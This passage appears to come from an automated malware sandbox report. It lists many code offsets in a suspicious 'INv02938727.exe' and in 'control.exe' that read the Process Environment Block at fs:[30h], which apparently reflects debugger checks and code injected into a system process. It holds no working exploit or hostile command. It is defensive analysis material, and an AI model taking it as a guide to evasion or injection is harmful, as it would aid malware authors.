            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0132740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0132740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0132740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013114FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01328CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01254F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01254F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0132070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0132070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01328F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01268794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012937F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0130FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01288E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01320EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01320EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01320EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012676E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012816E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01328ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012836CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01298EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0130FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E514FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E68CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E6740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E6740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E6740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E48DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E605AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E605AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E13540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E68D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E1A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E4FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E68ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E60EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E60EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E60EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E146A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E4FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E17794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E17794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E17794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E68F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E6070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E6070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D94F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D94F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D958EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D99080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E13884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E13884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E61074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E52073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]
